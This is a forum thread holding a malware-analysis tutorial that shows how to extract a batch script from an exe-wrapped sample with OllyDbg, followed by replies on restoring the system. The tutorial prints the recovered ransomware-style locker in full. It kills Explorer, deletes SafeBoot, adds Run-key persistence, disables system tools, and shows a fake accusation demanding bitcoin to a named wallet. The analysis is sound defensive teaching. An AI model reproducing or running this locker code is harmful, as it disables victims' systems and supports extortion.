Author Topic: [Tutorial] Analyzing Malware by Example Part 7 - Unwrapping Exe Converters  (Read 1860 times)

0 Members and 3 Guests are viewing this topic.

Offline Deque

  • P.I.N.N.
  • Global Moderator
  • Overlord
  • *
  • Posts: 1203
  • Cookies: 518
  • Programmer, Malware Analyst
    • View Profile
Unwrapping Exe Converters

Sample

Please download the following sample.

Win32.b1t.zip

Caution! This is live malware!

The password is "infected" without quotes.

Introduction to Wrappers

This tutorial will show you how to unwrap a wrapped file using OllyDbg. Wrapped files have a script or executable in their body, which they drop and run upon execution. Typically wrappers create exe files from, e.g., batch scripts, python scripts, jar files, autoit scripts. They are a very mild form of obfuscation, because the script or executable to be wrapped is most of the time encoded or encrypted within the resulting file.

Wrapped files often use the TEMP folder to drop the file, execute the dropped file, then delete it. The biggest difficulty is that the dropped file gets usually deleted before you can copy it. Simple forms of circumventing this situation are mentioned below. In this case we will use OllyDbg to obtain the dropped file.

Method 1: Change the folder permissions

  • Right-Click the folder, click on Properties
  • Click on the Security tab
  • If the Security tab is not there, you need to go to the folder options and uncheck Use simple file sharing
  • In the Security tab click Add..
  • Enter Everyone into the object name box, click OK
  • Click on Advanced. Select Everyone, then click on the Edit button
  • Place a checkmark in the deny column for delete and delete subfolders and files.
  • Click OK until all Windows are closed.
Note: Sometimes this will not work, because wrappers may create a temp file to unpack it, then delete the temp file and create a folder of the same name.

Method 2: Use a file copy script

Save the following batch file, replace the filename with the actual name of the temp file, and run the script prior to executing the sample. This will only work if you know the name of the temp file beforehand. If the sample creates a random name, you need to use another method to obtain the file.

Code: (Batch) [Select]
@echo off
:loop
copy %TEMP%\<filename> .
goto loop

Method 3: Use a debugger

With a debugger like OllyDbg, break at a point were all files have been created but not yet deleted and copy them.

Analysis

Take a look at the executable with a hex editor first. Two things might tell you that this is wrapped file.

1. Antivirus detections contain BAT as platform.
2. Plaintext in the executable hints to the use of a b2e (batch to exe) converter.

That plaintext part looks as follows:

Code: [Select]
Overwrite? An unknown error occured. The program will be terminated. \ B D F I b2eincfilepath N O P S X open b2eargs Continue? extd b2etempfile b2eincfile @shift /0 Password Choose a location to save the files. -b2epass b2eprogramshortname Please enter the password. Error! b2eincfilecount The file 
 This program is not supported on your operating system. b2eprogramfilename Can not create some of your include files. b2eprogramname @call:extd Can not allocate the memory. OK b2eprogrampathname b2eextd Wrong password. extd.exe

   already exists in the current directory. Overwrite?      ÿÿÿÿ    ÿÿÿÿ    ÿÿÿÿ:extd
   @set result=
   @%b2eextd% "%~1" "%~2" "%~3" "%~4" "%~5" "%~6" "%~7" "%~8" "%~9" > "%b2etempfile%"
   @set /p result= < "%b2etempfile%"
   @del "%b2etempfile%"
   @goto:eof

Although this is some batch code, it is not the batch script that we want.

It is time to run the sample in your lab. You will realize soon that the Windows explorer disappears, the desktop is not functional anymore, and any attempts to open taskmanager or the command prompt will fail.



If you restart the machine, you will have the same situation after logging in. This would be typical behaviour for a system locker, but there is no ransom message. It also makes attempts to obtain the batch script more difficult. If you have ProcessExplorer still open, you will be able to kill the process that terminates the explorer. You will also be able to observe that a batch file was created in a randomly named subfolder in TEMP. But the batch file is soon gone after execution.

Unwrapping

Now start on a fresh VM and open the sample in OllyDgb. Create a snapshot before you start debugging. Olly wilt break as usual at the entry point of the executable.



Now think about it: What does the sample do before it runs the batch file?
It will write the file to TEMP. So we can set a breakpoint on WriteFile to halt before the TEMP file is written. Do that and press F9 to proceed with execution.

OllyDbg will break in this area within kernel32



Take a look at the registers. You can clearly see that a reference to the batch string is in the EDX register.



Right-click on the address and follow in dump.



The batch string will appear in the dump window and it seems to be complete.



This is a good point in time to create a dump of the process. I used ProcessExplorer in this case.



Now open the dumped memory in a hex editor and search for the beginning of the batch file, e.g., I searched for echo off in ASCII.



Copy and paste the batch file string to a new file. Et voila, you got the complete batch script! The most interesting part comes now. Open the script in a text editor like Notepad++ and analyse the code.

Code: (Batch) [Select]
@shift /0
@echo off
color c
taskkill /im explorer.exe /f > nul
Reg Delete HKLM\System\CurrentControlSet\Control\SafeBoot /f > nul
copy %0 C:\Windows\Win32.bat > nul
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Win32 /t REG_SZ /d C:\Windows\Win32.bat /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD/t REG_DWORD/d 2 /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer/v NoControlPanel /t REG_DWORD /d 1 /f >nul
cls
title Windows blocked, file encrypt
echo Windows Blocked!
echo Hello, we inform you that your system
has been blocked and all the files are
encrypted for viewing child porn.
You can unlock the system,
for this you need to pay 0.5 BTC ¦ 1G2GAivmaBkTephZsorQsyGFNNdBs3bWMB
in the wallet Bitcoin application is written in your email address to which you will
be sent the code to unlock it.
echo Enter C0d3:
:upo
set /p x=
if %x%==123456789 (echo Windows start!
start explorer
reg Delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD/t REG_DWORD/d 0 /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 0 /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer/v NoControlPanel /t REG_DWORD /d 0 /f >nul
exit
) ELSE (
cls
echo ERROR!
echo Enter C0d3:
)
goto upo

This looks like a complete fail, doesn't it?
It is indeed a system locker ransomware, but there will never be a ransom note, because the command prompt is disabled and the ransom message is only shown in the command prompt!

Your task: Imagine a friend of yours got his or her system infected by this system locker. How would you be able to restore the system?
« Last Edit: February 08, 2016, 01:57:20 pm by Deque »

Offline Sherlock3d

  • /dev/null
  • *
  • Posts: 6
  • Cookies: 0
  • Nada resulta más engañoso que un hecho evidente.
    • View Profile
Re: [Tutorial] Analyzing Malware by Example Part 7 - Unwrapping Exe Converters
« Reply #1 on: February 18, 2016, 04:15:17 pm »
I appreciate your work really interesting and this post was so good so thank you for taking your time writing it for us!
The way i would restore the system is easy cause we have the source code, just by launching this bat part:
Code: [Select]
start explorer
reg Delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD/t REG_DWORD/d 0 /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 0 /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer/v NoControlPanel /t REG_DWORD /d 0 /f >nul
exit
If we can't launch the batch script we can boot with diferent ways to modify registry entries.
Sherlock3d
« Last Edit: February 18, 2016, 04:17:02 pm by Sherlock3d »
Lo que sabemos es una gota de agua; lo que ignoramos es el océano.

Offline Deque

  • P.I.N.N.
  • Global Moderator
  • Overlord
  • *
  • Posts: 1203
  • Cookies: 518
  • Programmer, Malware Analyst
    • View Profile
Re: [Tutorial] Analyzing Malware by Example Part 7 - Unwrapping Exe Converters
« Reply #2 on: February 19, 2016, 03:41:02 pm »
I appreciate your work really interesting and this post was so good so thank you for taking your time writing it for us!
The way i would restore the system is easy cause we have the source code, just by launching this bat part:
Code: [Select]
start explorer
reg Delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD/t REG_DWORD/d 0 /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 0 /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer/v NoControlPanel /t REG_DWORD /d 0 /f >nul
exit
If we can't launch the batch script we can boot with diferent ways to modify registry entries.
Sherlock3d

This is correct. How exactly would you execute the batch code? You said you can boot with different ways. Which way would you use?

Offline Sherlock3d

  • /dev/null
  • *
  • Posts: 6
  • Cookies: 0
  • Nada resulta más engañoso que un hecho evidente.
    • View Profile
Re: [Tutorial] Analyzing Malware by Example Part 7 - Unwrapping Exe Converters
« Reply #3 on: February 19, 2016, 08:42:41 pm »
Well this situation doesn't need any special boot due to the fact that the ransom doesn't persists it self, but in other situation you can easly boot with other s.o in live mode and then change whatever you need!
Sherlock3d
« Last Edit: February 19, 2016, 08:43:05 pm by Sherlock3d »
Lo que sabemos es una gota de agua; lo que ignoramos es el océano.

Offline blindfuzzy

  • VIP
  • Peasant
  • *
  • Posts: 86
  • Cookies: 34
    • View Profile
Re: [Tutorial] Analyzing Malware by Example Part 7 - Unwrapping Exe Converters
« Reply #4 on: February 20, 2016, 06:39:27 am »
Great tutorial!
Just curious what you mean by this? "Antivirus detections contain BAT as platform." Meaning the AV detection is in a BAT file?

Offline Sherlock3d

  • /dev/null
  • *
  • Posts: 6
  • Cookies: 0
  • Nada resulta más engañoso que un hecho evidente.
    • View Profile
Re: [Tutorial] Analyzing Malware by Example Part 7 - Unwrapping Exe Converters
« Reply #5 on: February 20, 2016, 02:47:30 pm »
Great tutorial!
Just curious what you mean by this? "Antivirus detections contain BAT as platform." Meaning the AV detection is in a BAT file?
Well I think he wanted to say that bat files are clasified as possible malware by signature-based antivirus!
Sherlock3d
« Last Edit: February 20, 2016, 02:48:13 pm by Sherlock3d »
Lo que sabemos es una gota de agua; lo que ignoramos es el océano.

Offline techb

  • Soy Sauce Feeler
  • Global Moderator
  • King
  • *
  • Posts: 2350
  • Cookies: 345
  • Aliens do in fact wear hats.
    • View Profile
    • github
>>>import this
-----------------------------

Offline Deque

  • P.I.N.N.
  • Global Moderator
  • Overlord
  • *
  • Posts: 1203
  • Cookies: 518
  • Programmer, Malware Analyst
    • View Profile
Re: [Tutorial] Analyzing Malware by Example Part 7 - Unwrapping Exe Converters
« Reply #7 on: February 21, 2016, 05:30:29 pm »
Well this situation doesn't need any special boot due to the fact that the ransom doesn't persists it self, but in other situation you can easly boot with other s.o in live mode and then change whatever you need!
Sherlock3d

It persists, adds itself to the RUN entry in the registry.

Great tutorial!
Just curious what you mean by this? "Antivirus detections contain BAT as platform." Meaning the AV detection is in a BAT file?

I mean detection names like these: https://www.virustotal.com/en/file/936d9411d5226b7c5a150ecaf422987590a8870c8e095e1caa072273041a86e7/analysis/

In this case it is actually a Batch file, but if you see these detection names on an EXE file, you can be quite sure that this is wrapped.